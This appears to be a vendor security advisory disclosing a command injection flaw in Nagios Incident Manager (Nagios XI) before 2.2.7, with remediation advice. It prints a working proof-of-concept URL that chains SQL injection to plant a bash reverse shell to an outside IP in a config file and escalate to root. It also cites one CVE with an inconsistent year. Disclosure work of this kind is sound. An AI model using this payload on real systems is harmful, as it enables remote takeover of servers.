A Command Injection vulnerability in Nagios Incident Manager (component of Nagios XI) before 2.2.7 allows authenticated attackers to achieve remote code execution via a malicious
“Resolve network incidents, collaborate with team members, and track incident history”. For more information visit https://www.nagios.com/products/nagios-incident-manager/.
The Nagios XI API
/nagiosxi/includes/components/nagiosim/nagiosim.php allows interaction with Nagios IM through the file
At , the
host variable is read from the database query shown in CVE-2020-9204. At , it is used into a command string without sanitization nor validation. At  the assembled command is run.
An authenticated attacker can achieve Remote Code Execution through a malicious
host record in a network incident.
Note: this PoC exploits CVE-2019-9204, CVE-2019-9166 and CVE-2019-9203 too to achieve root remote code execution.
[host]/nagiosxi/includes/components/nagiosim/nagiosim.php?mode=update&token=&incident_id=1'UNION%20select%201,2,3,4,"';echo%20'print(\"bash+-i+>%26+/dev/tcp/10.13.37.42/8080+0>%261+%23\")%3b'>>+/usr/local/nagiosxi/html/config.inc.php%3b+sudo+/usr/local/nagiosxi/scripts/repair_databases.sh%3b%23",6,7,8,'xusing the logged-in session
An authenticated attacker can take control of Nagios XI.
Upgrade to Nagios IM 2.2.7 or later. (Note: we didn’t verify the patch.)
This report was subject to Shielder’s disclosure policy:
`polict` of Shielder
This advisory was first published on https://www.shielder.com/advisories/nagiosim-host-remote-code-execution/
10 April 2019